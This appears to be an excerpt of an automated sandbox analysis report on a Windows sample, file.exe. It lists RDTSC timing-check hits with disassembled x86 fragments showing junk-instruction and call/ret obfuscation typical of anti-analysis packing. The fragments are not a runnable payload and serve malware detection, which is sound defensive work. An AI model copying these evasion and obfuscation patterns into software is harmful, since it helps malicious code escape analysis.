                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808A3A second address: 808A96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F51CCC6C588h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 adc di, C770h 0x00000028 push 00000000h 0x0000002a jg 00007F51CCC6C587h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 mov ebx, 7111816Ch 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a pushad 0x0000003b ja 00007F51CCC6C586h 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 popad 0x00000044 push eax 0x00000045 push esi 0x00000046 pop esi 0x00000047 pop eax 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 806D55 second address: 806D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808A96 second address: 808A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809932 second address: 80994A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F51CD041DF6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80BB29 second address: 80BB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 807CAB second address: 807CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809B62 second address: 809B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80AB89 second address: 80AB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809B66 second address: 809B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80CAEA second address: 80CAEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80AB8D second address: 80AB93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80CAEF second address: 80CB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F51CD041DFEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80AB93 second address: 80ABB9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F51CCC6C597h 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80CB00 second address: 80CBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 mov ebx, dword ptr [ebp+122D1D2Fh] 0x0000000c mov edi, dword ptr [ebp+122D3854h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F51CD041DF8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e movzx ebx, si 0x00000031 jmp 00007F51CD041E01h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F51CD041DF8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 call 00007F51CD041DFBh 0x00000057 adc bx, C431h 0x0000005c pop edi 0x0000005d xchg eax, esi 0x0000005e jmp 00007F51CD041E05h 0x00000063 push eax 0x00000064 jnc 00007F51CD041E19h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F51CD041E01h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80CDF1 second address: 80CDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80CDF5 second address: 80CDFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81046A second address: 81047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C591h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81047F second address: 810483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 810558 second address: 81055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818428 second address: 81842C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81842C second address: 81844A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F51CCC6C586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F51CCC6C58Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81844A second address: 818452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818452 second address: 818468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C591h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818468 second address: 81846E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8185B1 second address: 8185B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8185B7 second address: 8185BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8185BB second address: 8185E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C593h 0x00000007 ja 00007F51CCC6C58Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8185E5 second address: 8185FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F51CD041DFFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8185FB second address: 8185FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8185FF second address: 818605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818605 second address: 81861D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007F51CCC6C586h 0x0000000d js 00007F51CCC6C586h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81861D second address: 818623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 818623 second address: 818627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E8EA second address: 81E8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E8F0 second address: 81E91D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F51CCC6C586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jmp 00007F51CCC6C595h 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E91D second address: 81E953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F51CD041DF8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F51CD041DFAh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007F51CD041DFEh 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E953 second address: 81E957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81EA87 second address: 81EA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 825393 second address: 825398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8247ED second address: 8247F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8247F7 second address: 8247FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8247FB second address: 824818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CD041E03h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824B7F second address: 824B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824D72 second address: 824D7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F51CD041DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824EEC second address: 824EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824EF0 second address: 824F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E08h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F51CD041E0Dh 0x00000014 jmp 00007F51CD041E07h 0x00000019 jmp 00007F51CD041DFEh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8299A4 second address: 8299A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8299A8 second address: 8299B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F51CD041DF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8299B8 second address: 8299BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829C89 second address: 829C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829C8D second address: 829CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F51CCC6C597h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829F4B second address: 829F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829F4F second address: 829F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C590h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F51CCC6C58Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82A3CB second address: 82A3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82A852 second address: 82A870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F51CCC6C595h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82A870 second address: 82A876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82A876 second address: 82A885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F51CCC6C586h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82A885 second address: 82A8B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jl 00007F51CD041E24h 0x00000012 jmp 00007F51CD041E03h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82A8B5 second address: 82A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82AA2F second address: 82AA33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82AA33 second address: 82AA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82ADDE second address: 82ADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82969E second address: 8296B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F51CCC6C58Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8296B8 second address: 8296BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8311B7 second address: 8311BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8314A9 second address: 8314BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F51CD041DFAh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8314BA second address: 8314CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8314CC second address: 8314D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8314D2 second address: 8314D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F49E6 second address: 7F49F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F49F0 second address: 7F4A41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a movsx esi, di 0x0000000d mov dword ptr [ebp+122D2CFCh], esi 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp+1247A768h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F51CCC6C588h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D2BDAh] 0x0000003a nop 0x0000003b jl 00007F51CCC6C590h 0x00000041 pushad 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4A41 second address: 7F4A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4A4D second address: 7F4A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4A53 second address: 7F4A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4A5D second address: 7DE917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F51CCC6C588h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 call dword ptr [ebp+122D1952h] 0x00000029 push ebx 0x0000002a jmp 00007F51CCC6C58Eh 0x0000002f pop ebx 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5188 second address: 7F5192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5192 second address: 7F51B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F51CCC6C586h 0x0000000a popad 0x0000000b popad 0x0000000c xor dword ptr [esp], 73B9BBEFh 0x00000013 mov dword ptr [ebp+122D2A4Fh], ebx 0x00000019 push 3059B348h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F51B6 second address: 7F51BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F53F4 second address: 7F5408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F51CCC6C586h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5408 second address: 7F5430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFEh 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F51CD041E00h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F55AD second address: 7F55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F55B4 second address: 7F55BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F59A5 second address: 7F59AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5B20 second address: 7F5B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5B29 second address: 7F5B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5C58 second address: 7F5C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5C5C second address: 7F5C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a jmp 00007F51CCC6C58Dh 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F51CCC6C58Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5D84 second address: 7F5D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5D88 second address: 7F5DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 7C1DFE16h 0x0000000e lea eax, dword ptr [ebp+1247A7ACh] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F51CCC6C588h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D1CE0h] 0x00000034 push eax 0x00000035 jbe 00007F51CCC6C590h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BFBA second address: 83BFEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E09h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F51CD041E03h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BFEC second address: 83C005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C595h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
